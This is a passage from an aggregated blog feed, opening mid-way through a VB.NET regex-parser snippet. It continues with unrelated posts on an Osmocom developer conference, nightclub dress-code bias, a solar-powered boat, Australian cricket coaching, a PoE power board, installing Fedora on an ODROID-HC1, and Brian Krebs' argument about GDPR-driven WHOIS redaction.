                    Dim auf_zu As Integer = 1
                    Do
                        Select Case Line(ii)
                            Case "("
                                auf_zu += 1
                            Case ")"
                                auf_zu -= 1
                            Case "/"
                                ii += 1
                        End Select
                        ii += 1
                    Loop Until auf_zu = 0
                    ret(retID).Subblocks = SplitLine(Line.Substring(i + 1, ii - 1))
                    ret(retID).Mode = Char_Mode.subitems
                    ret(retID).passed = False

                Case "*"
                    ret(retID).Multi = True
                    ret(retID).passed = False
                Case "|"
                    ret(retID)._Optional = True

                Case "/"
                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    ret(retID).Mode = Char_Mode._Char
                    ret(retID).Type = New Chars(Line(i + 1), Chartypes.other)
                    i += 1
                    ret(retID).passed = False

                Case Else

                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    ret(retID).Mode = Char_Mode.Type
                    ret(retID).Type = New Chars(Line(i), TocType(CC))
                    ret(retID).passed = False
            End Select
        Next
        Return ret
    End Function
    Private Shared Function TocType(p1 As Char) As Chartypes
        Select Case p1
            Case "c"
                Return Chartypes._Char
            Case "n"
                Return Chartypes.Number
            Case "?"
                Return Chartypes.any
            Case Else
                Return Chartypes.other
        End Select
    End Function

    Public Enum Char_Mode As Integer
        Type = 1
        _Char = 2
        subitems = 3
    End Enum
    Public Enum Chartypes As Integer
        _Char = 1
        Number = 2
        other = 4
        any
    End Enum
    Structure Chars
        Dim Char_V As Char
        Dim Type As Chartypes
        Sub New(Char_ As Char, typ As Chartypes)
            Char_V = Char_
            Type = typ
        End Sub
    End Structure
End Class

I’ll say this: building a finite state machine, which is what the core of a regex engine is, is perhaps the only case where using a GoTo could be considered acceptable. So this code has that going for it. Philemon was kind enough to share this code with us, so we knew he knows it’s bad.

[Advertisement] ProGet can centralize your organization's software applications and components to provide uniform access to developers and servers. Check it out!

Planet Linux AustraliaOpenSTEM: Be Gonski Ready!

Gonski is in the news again with the release of the Gonski 2.0 report. This is most likely to impact on schools and teachers in a range of ways from funding to curriculum. Here at OpenSTEM we can help you to be ahead of the game by using our materials, which are already Gonski-ready! The […]

,

Harald WelteOsmoDevCon 2018 retrospective

One week ago, the annual Osmocom developer meeting (OsmoDevCon 2018) concluded after four long and intense days with old and new friends (schedule can be seen here

It was already the 7th incarnation of OsmoDevCon, and I have to say that it's really great to see the core Osmocom community come together every year, to share their work and experience with their fellow hackers.

Ever since the beginning we've had the tradition that we look beyond our own projects. In 2012, David Burgess was presenting on OpenBTS. In 2016, Ismael Gomez presented about srsUE + srsLTE, and this year we've had the pleasure of having Sukchan Kim coming all the way from Korea to talk to us about his nextepc project (a FOSS implementation of the Evolved Packet Core, the 4G core network).

What has also been a regular "entertainment" part in recent years are the field trip reports to various [former] satellite/SIGINT/... sites by Dimitri Stolnikov.

All in all, the event has become at least as much about the people than about technology. It's a community of like-minded people that to some part are still working on joint projects, but often work independently and scratch their own itch - whether open source mobile comms related or not.

After some criticism last year, the so-called "unstructured" part of OsmoDevCon has received more time again this year, allowing for exchange among the participants irrespective of any formal / scheduled talk or discussion topic.

In 2018, with the help of c3voc, for the first time ever, we've recorded most of the presentations on video. The results are still in the process of being cut, but are starting to appear at https://media.ccc.de/c/osmodevcon2018

If you want to join a future OsmoDevCon in person: Make sure you start contributing to any of the many Osmocom member projects now to become eligible. We need you!

Now the sad part i that it will take one entire year until we'll reconvene. May the Osmocom Developer community live long and prosper. I want to meet you guys for many more years at OsmoDevCon!

There is of course the user-oriented OsmoCon 2018 in October, but that's of course a much larger event with a different audience.

Nevertheless, I'm very much looking forward to that, too.

The OsmoCon 2018 Call for Participation is still running. Please consider submitting talks if you have anything open source mobile communications related to share!

Sociological ImagesBouncers and Bias

Originally Posted at TSP Discoveries

Whether we wear stilettos or flats, jeans or dress clothes, our clothing can allow or deny us access to certain social spaces, like a nightclub. Yet, institutional dress codes that dictate who can and cannot wear certain items of clothing target some marginalized communities more than others. For example, recent reports of bouncers denying Black patrons from nightclubs prompted Reuben A Buford May and Pat Rubio Goldsmith to test whether urban nightclubs in Texas deny entrance for Black and Latino men through discriminatory dress code policies.

Photo Credit: Bruce Turner, Flickr CC

For the study, recently published in Sociology of Race and EthnicityThe authors recruited six men between the ages of 21 and 23. They selected three pairs of men by race — White, Black, and Latino — to attend 53 urban nightclubs in Dallas, Houston, and Austin. Each pair shared similar racial, socioeconomic, and physical characteristics. One individual from each pair dressed as a “conformist,” wearing Ralph Lauren polos, casual shoes, and nice jeans that adhered to the club’s dress code. The other individual dressed in stereotypically urban dress, wearing “sneakers, blue jean pants, colored T-shirt, hoodie, and a long necklace with a medallion.” The authors categorized an interaction as discrimination if a bouncer denied a patron entrance based on his dress or if the bouncer enforced particular dress code rules, such as telling a patron to tuck in their necklace. Each pair attended the same nightclub at peak hours three to ten minutes apart. The researchers exchanged text messages with each pair to document any denials or accommodations.

Black men were denied entrance into nightclubs 11.3 percent of the time (six times), while White and Latino men were both denied entry 5.7 percent of the time (three times). Bouncers claimed the Black patrons were denied entry because of their clothing, despite allowing similarly dressed White and Latino men to enter. Even when bouncers did not deny entrance, they demanded that patrons tuck in their necklaces to accommodate nightclub policy. This occurred two times for Black men, three times for Latino men, and one time for White men. Overall, Black men encountered more discriminatory experiences from nightclub bouncers, highlighting how institutions continue to police Black bodies through seemingly race-neutral rules and regulations.

Amber Joy is a PhD student in sociology at the University of Minnesota. Her current research interests include punishment, sexual violence and the intersections of race, gender, age, and sexuality. Her work examines how state institutions construct youth victimization.

Planet Linux AustraliaDavid Rowe: Solar Boat

Two years ago when I bought my Hartley TS16 sail boat I dreamed of converting it to solar power. In January I installed a Torqueedo electric outboard and a 24V, 100AH Lithium battery back. That’s working really well. Next step was to work out a way to mount some surplus 200W solar panels on the boat. The idea is to (temporarily) detach the mast, and use the boat on the river Murray, a major river that passes within 100km of where I live in Adelaide, South Australia.

Over the last few weeks I worked with my friend Gary (VK5FGRY) to mount solar panels on the TS16. Gary designed and fabricated some legs from 40mm square aluminium:

With a matching rubber foot on each leg, the panels sit firmly on the gel coat of the boat, and are held down by ropes or octopus straps.

The panels maximum power point is at 28.5V (and 7.5A) which is close to the battery pack under charge (3.3*8 = 26.4V) so I decided to try a direct DC connection – no inverter or charger. I ran some tests in the back yard: each panel was delivering about 4A into the battery pack, and two in parallel delivered about 8A. I didn’t know solar panels could be connected in parallel, but happily this means I can keep my direct DC connection. Horizontal panels costs a few amps – a good example of why solar panels are usually angled at the sun. However the azimuth of the boat will be always changing so horizontal is the only choice. The panels are very sensitive to shadowing; a hand placed on a panel, or a small shadow is enough to drop the current to 0A. OK, so now I had a figure for panel output – about 4A from each panel.

This didn’t look promising. Based on my sea voyages with the Torqueedo, I estimated I would need 800W (about 30A) to maintain my target houseboat speed of 4 knots (7 km/hr); that’s 8 panels which won’t ft on my boat! However the current draw on the river might be different without tides, and waves, and I wasn’t sure exactly how many AH I would get over a day from the sun. Would trees on the river bank shadow the panels?

So it was off to Younghusband on the Murray, where our friend Chris (VK5CP) was hosting a bunch of Ham Radio guys for an extended Anzac day/holiday weekend. It’s Autumn here, with generally sunny days of about 23C. The sun is up from from 6:30am to 6pm.

Turns out that even with two panels – the solar boat was really practical! Over three days we made three trips of 2 hours each, at speeds of 3 to 4 knots, using only the panels for charging. Each day I took friends out, and they really loved it – so quiet and peaceful, and the river scenery is really nice.

After an afternoon cruise I would park the boat on the South side of the river to catch the morning sun, which in Autumn appears to the North here in Australia. I measured the panel current as 2A at 7am, 6A at 9am, 9A at 10am, and much to my surprise the pack was charged by 11am! In fact I had to disconnect the panels as the cell voltage was pushing over 4V.

On a typical run upriver we measured 700W = 4kt, 300W = 3.1kt, 150W = 2.5kt, and 8A into the panels in full sun. Panel current dropped to 2A with cloud which was a nasty surprise. We experienced no shadowing issues from trees. The best current we saw at about noon was 10A. We could boost the current by 2A by putting three guys on one side of the boat and tipping the entire boat (and solar panels) towards the sun!

Even partial input from solar can have a big impact. Lets say at 4 knots (30A) I can drive for 2 hours using 60% of my 100AH pack. If I back off the speed a little, so I’m drawing 20A, then 10A from the panels will extend my driving time to 6 hours.

I slept on the boat, and one night I found a paddle steamer (the Murray Princess) parked across the river from me, all lit up with fairy lights:

On our final adventure, my friend Darin (VK5IX) and I were entering Lake Carlet, when suddenly the prop hit something very hard, “crack crack crack”. My poor prop shaft was bent and my propeller is wobbling from side to side:

We gently e-motored back and actually recorded our best results – 3 knots on 300W, 10A from the panels, 10A to the motor.

With 4 panels I would have a very practical solar boat, capable of 4-6 hours cruising a day just on solar power. The 2 extra panels could be mounted as a canopy over the rear of the boat. I have an idea about an extended solar adventure of several days, for example 150km from Younghusband to Goolwa.

Reading Further

Engage the Silent Drive
Lithium Cell Amp Hour Tester and Electric Sailing

Sam VargheseAppointing Justin Langer as coach will not solve Australia’s problems

In February, the Australian cricket team was in serious trouble after some players were caught cheating on the field.

The captain, vice-captain and the player who was the executor of the cheating that had been planned all lost their places and were ejected from cricket. Captain Steve Smith and vice-captain David Warner were banned for two years and Cameron Bancroft for nine months.

Coach Darren Lehmann retained his job but resigned soon thereafter.

The new coach, appointed recently, is Justin Langer. Through this appointment, Cricket Australia hopes to avoid any incidents that bring more disrepute on the team.

It would have been better if they had appointed former Test fast bowler Jason Gillespie. Langer, it may be recalled, tried to cheat during a Test match against Sri Lanka in 2004.

To quote from a published report: “In a bizarre incident, Langer brushed and dislodged a bail midway through the 80th over of Sri Lanka’s innings, an action he later described as unintentional. After left-handed batsman Hashan Tillakaratne completed a single to fine-leg, Australia’s fieldsmen crossed the pitch in preparation for the right-handed Thilan Samaraweera. Langer walked between the wicket and Samaraweera and broke the stumps with his hand.

“Later, Australian captain Ricky Ponting asked umpires Steve Bucknor and Dave Orchard about the fallen bail, but neither had seen Langer as he crossed the pitch. Accordingly, Bucknor and Orchard stopped play for three minutes while the matter was taken to third umpire Peter Manuel.

“Manuel ruled Tillakaratne not out. A reportedly upset Langer consulted team manager Steve Bernard during the lunch break, claiming to have been unaware that he was responsible for dislodging the bail.

“Bernard immediately relayed Langer’s sentiments to ICC match referee Chris Broad who, after receiving a report from the umpires at tea, charged the West Australian with a code of conduct breach. Broad later decided Langer had made an innocent mistake. However, he reminded the batsman to take more care in similar situations in the future.”

Langer is also the same man who denied he made contact with the ball when he nicked Wasim Akram to the keeper during a Test match in Hobart in 2009. Australia won that Test by six wickets, chasing down 350-plus.

In 2016, Langer admitted that he had cheated in that case too.

And the men who run cricket in Australia think he is the right man to coach the team, just after it was involved in a case of ball-tampering. Welcome to the new coach, a good likeness of the old one.

Here are some highlights of Lehmann’s cricketing career:

Jan 2003: Banned for five one-day internationals for racial outburst against Sri Lankans, calling them black cunts.

March 2006: Reprimanded for comments against Cricket Australia sponsors ING. “a 9.30am start, I don’t know how many times you have to say it. Thank God we might be changing sponsors. That might allow us to play at different times.”

July 2006: Censured by Yorkshire for making an obscene gesture to the crowd.

December 2012: Fined US$3000 and suspended for two years after questioning the bowling action of West Indian Marlon Samuels.

“He couldn’t bowl in the IPL last year. Yet he can bowl in the BBL. We’ve got to seriously look at what we’re doing. Are we here to play cricket properly or what?”

August 2013: Accused Stuart Broad of “Blatant cheating” during 2013 Ashes series. On Broad’s decision not to walk after edging to slip: “I just hope the Australian public give it to him right from the word go and I hope he cries and goes home.”

August 2013: Fined 20%of his match fee for accusation against Broad.

April 2014: Admits that the 2003 racial outburst against Sri Lanka was the “biggest mistake of my life”.

March 2017: Lehmann defended Steve Smith after the then captain was caught on camera looking up to the pavilion for guidance before making a DRS call in Bangalore.

March 2018: Lehmann defended David Warner after the incident where the opener nearly came to blows with Quentin de Kock in the pavilion in Durban. On this he said: “There are things that cross the line and evoke emotion and you’ve got to deal with that. Both sides are going to push the boundaries. That’s part and parcel of Test match cricket.”

March 2018: Lehmann called Newlands’ crowd abuse “disgraceful” after Warner’s exchange with a fan.

March 2018: Resigns after ball tampering controversy.

The only thing left for Cricket Australia to do now is to appoint drug cheat Shane Warne to be the team’s adviser. That would be the clincher.

,

Planet Linux AustraliaJulien Goodwin: PoE termination board

For my next big project I'm planning on making it run using power over ethernet. Back in March I designed a quick circuit using the TI TPS2376-H PoE termination chip, and an LMR16020 switching regulator to drop the ~48v coming in down to 5v. There's also a second stage low-noise linear regulator (ST LDL1117S33R) to further drop it down to 3.3v, but as it turns out the main chip I'm using does its own 5->3.3v conversion already.

Because I was lazy, and the pricing was reasonable I got these boards manufactured by pcb.ng who I'd used for the USB-C termination boards I did a while back.

Here's the board running a Raspberry Pi 3B+, as it turns out I got lucky and my board is set up for the same input as the 3B+ supplies.



One really big warning, this is a non-isolated supply, which, in general, is a bad idea for PoE. For my specific use case there'll be no exposed connectors or metal, so this should be safe, but if you want to use PoE in general I'd suggest using some of the isolated convertors that are available with integrated PoE termination.

For this series I'm going to try and also make some notes on the mistakes I've made with these boards to help others, for this board:
  • I failed to add any test pins, given this was the first try I really should have, being able to inject power just before the switching convertor was helpful while debugging, but I had to solder wires to the input cap to do that.
  • Similarly, I should have had a 5v output pin, for now I've just been shorting the two diodes I had near the output which were intended to let me switch input power between two feeds.
  • The last, and the only actual problem with the circuit was that when selecting which exact parts to use I optimised by choosing the same diode for both input protection & switching, however this was a mistake, as the switcher needed a Schottky diode, and one with better ratings in other ways than the input diode. With the incorrect diode the board actually worked fine under low loads, but would quickly go into thermal shutdown if asked to supply more than about 1W. With the diode swapped to a correctly rated one it now supplies 10W just fine.
  • While debugging the previous I also noticed that the thermal pads on both main chips weren't well connected through. It seems the combination of via-in-thermal-pad (even tented), along with Kicad's normal reduction in paste in those large pads, plus my manufacturer's use of a fairly thin application of paste all contributed to this. Next time I'll probably avoid via-in-pad.


Coming soon will be a post about the GPS board, but I'm still testing bits of that board out, plus waiting for some missing parts (somehow not only did I fail to order 10k resistors, I didn't already have some in stock).

Planet Linux AustraliaChris Smart: Fedora on ODROID-HC1 mini NAS (ARMv7)

EDIT: I am having a problem where the Fedora kernel does not always detect the disk drive (whether cold, warm or hotplugged). I’ve built upstream 4.16 kernel and it works perfectly every time. It doesn’t seem to be uas related, disabling that on the usb-storage module doesn’t make any difference. I’m looking into it…

Hardkernel is a Korean company that makes various embedded ARM based systems, which it calls ODROID.

One of their products is the ODROID-HC1, a mini NAS designed to take a single 2.5″ SATA drive (HC stands for “Home Cloud”) which comes with 2GB RAM and a Gigabit Ethernet port. There is also a 3.5″ model called the HC2. Both of these are based on the ODROID-XU4, which itself is based on the previous iteration ODROID-XU3. All of these are based on the Samsung Exynos5422 SOC and should work with the following steps.

The Exynos SOC needs proprietary first stage bootloaders which are embedded in the first 1.4MB or so at the beginning of the SD card in order to load U-Boot. As these binary blobs are not re-distributable, Fedora cannot support these devices out of the box, however all the other bits are available including the kernel, device tree and U-Boot. So, we just need to piece it all together and the result is a stock Fedora system!

To do this you’ll need the ODROID device, a power supply (5V/4A for HC1, 12V/2A for HC2), one of their UART adapters, an SD card (UHS-I) and probably a hard drive if you want to use it as a NAS (you may also want a battery for the RTC and a case).

ODROID-HC1 with UART, RTC battery, SD card and 2.5″ drive.

Note that the default Fedora 27 ARM image does not support the Realtek RTL8153 Ethernet adapter out of the box (it does after a kernel upgrade) so if you don’t have a USB Ethernet dongle handy we’ll download the kernel packages on our host, save them to the SD card and install them on first boot. The Fedora 28 image works out of the box, so if you’re installing 28 you can skip that step.

Download the Fedora Minimal ARM server image and save it in your home dir.

Install the Fedora ARM installer and U-Boot bootloader files for the device on your host PC.

sudo dnf install fedora-arm-installer uboot-images-armv7

Insert your SD card into your computer and note the device (mine is /dev/mmcblk0) using dmesg or df commands. Once you know that, open a terminal and let’s write the Fedora image to the SD card! Note that we are using none as the target because it’s not a supported board and we will configure the bootloader manually.

sudo fedora-arm-image-installer \
--target=none \
--image=Fedora-Minimal-armhfp-27-1.6-sda.raw.xz \
--resizefs \
--norootpass \
--media=/dev/mmcblk0

First things first, we need to enable the serial console and turn off cpuidle else it won’t boot. We do this by mounting the boot partition on the SD card and modifying the extlinux bootloader configuration.

sudo mount /dev/mmcblk0p2 /mnt
 
sudo sed -i "s|append|& cpuidle.off=1 \
console=tty1 console=ttySAC2,115200n8|" \
/mnt/extlinux/extlinux.conf

As mentioned, the kernel that comes with Fedora 27 image doesn’t support the Ethernet adapter, so if you don’t have a spare USB Ethernet dongle, let’s download the updates now. If you’re using Fedora 28 this is not necessary.

cd /mnt
 
sudo wget http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-4.16.3-200.fc27.armv7hl.rpm \
http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-core-4.16.3-200.fc27.armv7hl.rpm \
http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-modules-4.16.3-200.fc27.armv7hl.rpm
 
cd ~/

Unmount the boot partition.

sudo umount /mnt

Now, we can embed U-Boot and the required bootloaders into the SD card. To do this we need to download the files from Hardkernel along with their script which writes the blobs (note that we are downloading the files for the XU4, not HC1, as they are compatible). We will tell the script to use the U-Boot image we installed earlier, this way we are using Fedora’s U-Boot not the one from Hardkernel.

Download the required files from Hardkernel.

mkdir hardkernel ; cd hardkernel
 
wget https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/sd_fusing.sh \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/bl1.bin.hardkernel \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/bl2.bin.hardkernel.720k_uboot \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/tzsw.bin.hardkernel
 
chmod a+x sd_fusing.sh

Copy the Fedora U-Boot files into the local dir.

cp /usr/share/uboot/odroid-xu3/u-boot.bin .

Finally, run the fusing script to embed the files onto the SD card, passing in the device for your SD card.
sudo ./sd_fusing.sh /dev/mmcblk0

That’s it! Remove your SD card and insert it into your ODROID, then plug the UART adapter into a USB port on your computer and connect to it with screen (check dmesg for the port number, generally ttyUSB0).

sudo screen /dev/ttyUSB0

Now power on your ODROID. If all goes well you should see the SOC initialise, load Fedora’s U-Boot and boot Fedora to the welcome setup screen. Complete this and then log in as root or your user you have just set up.

Welcome configuration screen for Fedora ARM.

If you’re running Fedora 27 image, install the kernel updates, remove the RPMs and reboot the device (skip this if you’re running Fedora 28).
sudo dnf install --disablerepo=* /boot/*rpm
 
sudo rm /boot/*rpm
 
sudo reboot

Fedora login over serial connection.

Once you have rebooted, the Ethernet adapter should work and you can do your regular updates

sudo dnf update

You can find your SATA drive at /dev/sda where you should be able to partition, format, mount it, share it and well, do whatever you want with the box.

You may wish to take note of the IP address and/or configure static networking so that you can SSH in once you unplug the UART.

Enjoy your native Fedora embedded ARM Mini NAS 🙂

,

CryptogramFriday Squid Blogging: Bizarre Contorted Squid

This bizarre contorted squid might be a new species, or a previously known species exhibiting a new behavior. No one knows.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Krebs on SecuritySecurity Trade-Offs in the New EU Privacy Law

On two occasions this past year I’ve published stories here warning about the prospect that new European privacy regulations could result in more spams and scams ending up in your inbox. This post explains in a question and answer format some of the reasoning that went into that prediction, and responds to many of the criticisms leveled against it.

Before we get to the Q&A, a bit of background is in order. On May 25, 2018 the General Data Protection Regulation (GDPR) takes effect. The law, enacted by the European Parliament, requires companies to get affirmative consent for any personal information they collect on people within the European Union. Organizations that violate the GDPR could face fines of up to four percent of global annual revenues.

In response, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — has proposed redacting key bits of personal data from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges (IP addresses).

Under current ICANN rules, domain name registrars should collect and display a variety of data points when someone performs a WHOIS lookup on a given domain, such as the registrant’s name, address, email address and phone number. Most registrars offer a privacy protection service that shields this information from public WHOIS lookups; some registrars charge a nominal fee for this service, while others offer it for free.

But in a bid to help registrars comply with the GDPR, ICANN is moving forward on a plan to remove critical data elements from all public WHOIS records. Under the new system, registrars would collect all the same data points about their customers, yet limit how much of that information is made available via public WHOIS lookups.

The data to be redacted includes the name of the person who registered the domain, as well as their phone number, physical address and email address. The new rules would apply to all domain name registrars globally.

ICANN has proposed creating an “accreditation system” that would vet access to personal data in WHOIS records for several groups, including journalists, security researchers, and law enforcement officials, as well as intellectual property rights holders who routinely use WHOIS records to combat piracy and trademark abuse.

But at an ICANN meeting in San Juan, Puerto Rico last month, ICANN representatives conceded that a proposal for how such a vetting system might work probably would not be ready until December 2018. Assuming ICANN meets that deadline, it could be many months after that before the hundreds of domain registrars around the world take steps to adopt the new measures.

In a series of posts on Twitter, I predicted that the WHOIS changes coming with GDPR will likely result in a noticeable increase in cybercrime — particularly in the form of phishing and other types of spam. In response to those tweets, several authors on Wednesday published an article for Georgia Tech’s Internet Governance Project titled, “WHOIS afraid of the dark? Truth or illusion, let’s know the difference when it comes to WHOIS.”

The following Q&A is intended to address many of the more misleading claims and assertions made in that article.

Cyber criminals don’t use their real information in WHOIS registrations, so what’s the big deal if the data currently available in WHOIS records is no longer in the public domain after May 25?

I can point to dozens of stories printed here — and probably hundreds elsewhere — that clearly demonstrate otherwise. Whether or not cyber crooks do provide their real information is beside the point. ANY information they provide — and especially information that they re-use across multiple domains and cybercrime campaigns — is invaluable to both grouping cybercriminal operations and in ultimately identifying who’s responsible for these activities.

To understand why data reuse in WHOIS records is so common among crooks, put yourself in the shoes of your average scammer or spammer — someone who has to register dozens or even hundreds or thousands of domains a week to ply their trade. Are you going to create hundreds or thousands of email addresses and fabricate as many personal details to make your WHOIS listings that much harder for researchers to track? The answer is that those who take this extraordinary step are by far and away the exception rather than the rule. Most simply reuse the same email address and phony address/phone/contact information across many domains as long as it remains profitable for them to do so.

This pattern of WHOIS data reuse doesn’t just extend across a few weeks or months. Very often, if a spammer, phisher or scammer can get away with re-using the same WHOIS details over many years without any deleterious effects to their operations, they will happily do so. Why they may do this is their own business, but nevertheless it makes WHOIS an incredibly powerful tool for tracking threat actors across multiple networks, registrars and Internet epochs.

All domain registrars offer free or a-la-carte privacy protection services that mask the personal information provided by the domain registrant. Most cybercriminals — unless they are dumb or lazy — are already taking advantage of these anyway, so it’s not clear why masking domain registration for everyone is going to change the status quo by much. 

It is true that some domain registrants do take advantage of WHOIS privacy services, but based on countless investigations I have conducted using WHOIS to uncover cybercrime businesses and operators, I’d wager that cybercrooks more often do not use these services. Not infrequently, when they do use WHOIS privacy options there are still gaps in coverage at some point in the domain’s history (such as when a registrant switches hosting providers) which are indexed by historic WHOIS records and that offer a brief window of visibility into the details behind the registration.

This is demonstrably true even for organized cybercrime groups and for nation state actors, and these are arguably some of the most sophisticated and savvy cybercriminals out there.

It’s worth adding that if so many cybercrooks seem nonchalant about adopting WHOIS privacy services it may well be because they reside in countries where the rule of law is not well-established, or their host country doesn’t particularly discourage their activities so long as they’re not violating the golden rule — namely, targeting people in their own backyard. And so they may not particularly care about covering their tracks. Or in other cases they do care, but nevertheless make mistakes or get sloppy at some point, as most cybercriminals do.

The GDPR does not apply to businesses — only to individuals — so there is no reason researchers or anyone else should be unable to find domain registration details for organizations and companies in the WHOIS database after May 25, right?

It is true that the European privacy regulations as they relate to WHOIS records do not apply to businesses registering domain names. However, the domain registrar industry — which operates on razor-thin profit margins and which has long sought to be free from any WHOIS requirements or accountability whatsoever — won’t exactly be tripping over themselves to add more complexity to their WHOIS efforts just to make a distinction between businesses and individuals.

As a result, registrars simply won’t make that distinction because there is no mandate that they must. They’ll just adopt the same WHOIS data collection and display polices across the board, regardless of whether the WHOIS details for a given domain suggest that the registrant is a business or an individual.

But the GDPR only applies to data collected about people in Europe, so why should this impact WHOIS registration details collected on people who are outside of Europe?

Again, domain registrars are the ones collecting WHOIS data, and they are most unlikely to develop WHOIS record collection and dissemination policies that seek to differentiate between entities covered by GDPR and those that may not be. Such an attempt would be fraught with legal and monetary complications that they simply will not take on voluntarily.

What’s more, the domain registrar community tends to view the public display of WHOIS data as a nuisance and a cost center. They have mainly only allowed public access to WHOIS data because ICANN’s contracts state that they should. So, from registrar community’s point of view, the less information they must make available to the public, the better.

Like it or not, the job of tracking down and bringing cybercriminals to justice falls to law enforcement agencies — not security researchers. Law enforcement agencies will still have unfettered access to full WHOIS records.

As it relates to inter-state crimes (i.e, the bulk of all Internet abuse), law enforcement — at least in the United States — is divided into two main components: The investigative side (i.e., the FBI and Secret Service) and the prosecutorial side (the state and district attorneys who actually initiate court proceedings intended to bring an accused person to justice).

Much of the legwork done to provide the evidence needed to convince prosecutors that there is even a case worth prosecuting is performed by security researchers. The reasons why this is true are too numerous to delve into here, but the safe answer is that law enforcement investigators typically are more motivated to focus on crimes for which they can readily envision someone getting prosecuted — and because very often their plate is full with far more pressing, immediate and local (physical) crimes.

Admittedly, this is a bit of a blanket statement because in many cases local, state and federal law enforcement agencies will do this often tedious legwork of cybercrime investigations on their own — provided it involves or impacts someone in their jurisdiction. But due in large part to these jurisdictional issues, politics and the need to build prosecutions around a specific locality when it comes to cybercrime cases, very often law enforcement agencies tend to miss the forest for the trees.

Who cares if security researchers will lose access to WHOIS data, anyway? To borrow an assertion from the Internet Governance article, “maybe it’s high time for security researchers and businesses that harvest personal information from WHOIS on an industrial scale to refine and remodel their research methods and business models.”

This is an alluring argument. After all, the technology and security industries claim to be based on innovation. But consider carefully how anti-virus, anti-spam or firewall technologies currently work. The unfortunate reality is that these technologies are still mostly powered by humans, and those humans rely heavily on access to key details about domain reputation and ownership history.

Those metrics for reputation weigh a host of different qualities, but a huge component of that reputation score is determining whether a given domain or Internet address has been connected to any other previous scams, spams, attacks or other badness. We can argue about whether this is the best way to measure reputation, but it doesn’t change the prospect that many of these technologies will in all likelihood perform less effectively after WHOIS records start being heavily redacted.

Don’t advances in artificial intelligence and machine learning obviate the need for researchers to have access to WHOIS data?

This sounds like a nice idea, but again it is far removed from current practice. Ask anyone who regularly uses WHOIS data to determine reputation or to track and block malicious online threats and I’ll wager you will find the answer is that these analyses are still mostly based on manual lookups and often thankless legwork. Perhaps such trendy technological buzzwords will indeed describe the standard practice of the security industry at some point in the future, but in my experience this does not accurately depict the reality today.

Okay, but Internet addresses are pretty useful tools for determining reputation. The sharing of IP addresses tied to cybercriminal operations isn’t going to be impacted by the GDPR, is it? 

That depends on the organization doing the sharing. I’ve encountered at least two cases in the past few months wherein European-based security firms have been reluctant to share Internet address information at all in response to the GDPR — based on a perceived (if not overly legalistic) interpretation that somehow this information also might be considered personally identifying data. This reluctance to share such information out of a concern that doing so might land the sharer in legal hot water can indeed have a chilling effect on the important sharing of threat intelligence across borders.

According to the Internet Governance article, “If you need to get in touch with a website’s administrator, you will be able to do so in what is a less intrusive manner of achieving this purpose: by using an anonymized email address, or webform, to reach them (The exact implementation will depend on the registry). If this change is inadequate for your ‘private detective’ activities and you require full WHOIS records, including the personal information, then you will need to declare to a domain name registry your specific need for and use of this personal information. Nominet, for instance, has said that interested parties may request the full WHOIS record (including historical data) for a specific domain and get a response within one business day for no charge.”

I’m sure this will go over tremendously with both the hacked sites used to host phishing and/or malware download pages, as well as those phished by or served with malware in the added time it will take to relay and approve said requests.

According to a Q3 2017 study (PDF) by security firm Webroot, the average lifespan of a phishing site is between four and eight hours. How is waiting 24 hours before being able to determine who owns the offending domain going to be helpful to either the hacked site or its victims? It also doesn’t seem likely that many other registrars will volunteer for this 24-hour turnaround duty — and indeed no others have publicly demonstrated any willingness to take on this added cost and hassle.

I’ve heard that ICANN is pushing for a delay in the GDPR as it relates to WHOIS records, to give the registrar community time to come up with an accreditation system that would grant vetted researchers access to WHOIS records. Why isn’t that a good middle ground?

It might be if ICANN hadn’t dragged its heels in taking GDPR seriously until perhaps the past few months. As it stands, the experts I’ve interviewed see little prospect for such a system being ironed out or in gaining necessary traction among the registrar community to accomplish this anytime soon. And most experts I’ve interviewed predict it is likely that the Internet community will still be debating about how to create such an accreditation system a year from now.

Hence, it’s not likely that WHOIS records will continue to be anywhere near as useful to researchers in a month or so than they were previously. And this reality will continue for many months to come — if indeed some kind of vetted WHOIS access system is ever envisioned and put into place.

After I registered a domain name using my real email address, I noticed that address started receiving more spam emails. Won’t hiding email addresses in WHOIS records reduce the overall amount of spam I can expect when registering a domain under my real email address?

That depends on whether you believe any of the responses to the bolded questions above. Will that address be spammed by people who try to lure you into paying them to register variations on that domain, or to entice you into purchasing low-cost Web hosting services from some random or shady company? Probably. That’s exactly what happens to almost anyone who registers a domain name that is publicly indexed in WHOIS records.

The real question is whether redacting all email addresses from WHOIS will result in overall more bad stuff entering your inbox and littering the Web, thanks to reputation-based anti-spam and anti-abuse systems failing to work as well as they did before GDPR kicks in.

It’s worth noting that ICANN created a working group to study this exact issue, which noted that “the appearance of email addresses in response to WHOIS queries is indeed a contributor to the receipt of spam, albeit just one of many.” However, the report concluded that “the Committee members involved in the WHOIS study do not believe that the WHOIS service is the dominant source of spam.”

Do you have something against people not getting spammed, or against better privacy in general? 

To the contrary, I have worked the majority of my professional career to expose those who are doing the spamming and scamming. And I can say without hesitation that an overwhelming percentage of that research has been possible thanks to data included in public WHOIS registration records.

Is the current WHOIS system outdated, antiquated and in need of an update? Perhaps. But scrapping the current system without establishing anything in between while laboring under the largely untested belief that in doing so we will achieve some kind of privacy utopia seems myopic.

If opponents of the current WHOIS system are being intellectually honest, they will make the following argument and stick to it: By restricting access to information currently available in the WHOIS system, whatever losses or negative consequences on security we may suffer as a result will be worth the cost in terms of added privacy. That’s an argument I can respect, if not agree with.

But for the most part that’s not the refrain I’m hearing. Instead, what this camp seems to be saying is if you’re not on board with the WHOIS changes that will be brought about by the GDPR, then there must be something wrong with you, and in any case here a bunch of thinly-sourced reasons why the coming changes might not be that bad.

